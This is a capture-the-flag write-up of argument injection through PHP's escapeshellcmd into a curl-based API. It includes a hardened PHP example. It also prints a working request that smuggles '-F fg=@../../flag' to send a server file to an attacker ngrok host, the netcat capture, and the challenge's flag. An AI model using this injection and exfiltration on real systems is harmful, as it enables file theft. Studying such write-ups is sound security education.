Tags: escapeshellcmd curl 


# Abstract
For the detailed version see the [Github page](https://github.com/KamilPacanek/writeups/blob/master/ctf/HTB.CA2021/caas.md).

## ToE
We are given the IP with a port and web application source code dump.

## Recon
Initial scan with `nmap` shows the website is running on `nginx`. The web application exposes a `/api/curl` endpoint, presumably using `curl` internally. In the `CommandModel.php` file we see that the `curl` command is built from a POST request parameter passed through PHP's `escapeshellcmd`.

`escapeshellcmd` has a known weakness we are going to exploit: it escapes shell metacharacters, but leaves spaces and leading dashes untouched, so additional arguments can still be injected. Quoting the manual page:

> **Warning**: `escapeshellcmd()` should be used on the whole command string, and it still allows the attacker to pass arbitrary number of arguments.
> For escaping a single argument `escapeshellarg()` should be used instead.
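To make the difference concrete, here is an added example (not the challenge's `CommandModel.php`, whose exact code is not shown here) contrasting the weak pattern with a hardened version. The `buildCommand*` names, the IP-only validation rule and the sample input are assumptions for illustration.

```php
<?php
// Added example: a reconstruction of the weak pattern next to a hardened one.
// Not the challenge's own CommandModel.php.

// Weak: escapeshellcmd() only neutralises shell metacharacters (; | & $ ...).
// Spaces and leading dashes survive, so a value such as
// "-F fg=@../../flag attacker.example" is handed to the shell as
// "curl -F fg=@../../flag attacker.example": curl receives extra arguments.
function buildCommandWeak(string $ip): string
{
    return escapeshellcmd("curl " . $ip);
}

// Hardened: validate the value first (assumed rule: it must be an IP address,
// anything else is rejected), then escapeshellarg() so the value becomes
// exactly one single-quoted argv element, whatever it contains.
// "--" tells curl that no further options follow, so even a leading dash
// could not be read as an option.
function buildCommandSafe(string $ip): string
{
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        throw new InvalidArgumentException("not an IP address");
    }
    return "curl -- " . escapeshellarg($ip);
}

// Returns true when the weak builder lets the input add arguments to curl,
// i.e. when the rendered command contains more than the two intended words.
function weakFormInjectsArguments(string $input): bool
{
    $argv = preg_split('/\s+/', trim(buildCommandWeak($input)));
    return count($argv) > 2;
}

// Constructed attacker-style input with a placeholder host (not a real target).
$userInput = "-F fg=@../../flag attacker.example";

echo buildCommandWeak($userInput), PHP_EOL;
echo weakFormInjectsArguments($userInput) ? "weak: arguments injected" : "weak: ok", PHP_EOL;

echo buildCommandSafe("10.0.0.5"), PHP_EOL;

try {
    buildCommandSafe($userInput);
} catch (InvalidArgumentException $e) {
    echo "safe: rejected (", $e->getMessage(), ")", PHP_EOL;
}
```

The hardened builder refuses the injected value outright; if hostnames must also be accepted, swap the validation for a strict hostname check rather than dropping it, since `escapeshellarg()` alone still lets a leading dash reach curl without the `--` separator.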

## Exploit
I've set up the `nc` listener via `ngrok` and run the following request:

```
curl -H "Content-Type: application/x-www-form-urlencoded" -d 'ip=-F fg=@../../flag 1f106a9e85a2.ngrok.io' -v 138.68.178.56:32236/api/curl
```

We see the flag on the netcat output:
```
listening on [any] 4444 ...

connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 58946
POST / HTTP/1.1
Host: 1f106a9e85a2.ngrok.io
User-Agent: curl/7.64.0
Content-Length: 227
Accept: */*
Content-Type: multipart/form-data; boundary=------------------------a588a0571ed8077f
X-Forwarded-For: 138.68.178.56
X-Forwarded-Proto: http
Accept-Encoding: gzip

--------------------------a588a0571ed8077f
Content-Disposition: form-data; name="fg"; filename="flag"
Content-Type: application/octet-stream

CHTB{f1le_r3trieval_4s_a_s3rv1ce}
--------------------------a588a0571ed8077f--
```

## Solution
> `CHTB{f1le_r3trieval_4s_a_s3rv1ce}`

Original writeup (https://github.com/KamilPacanek/writeups/blob/master/ctf/HTB.CA2021/caas.md).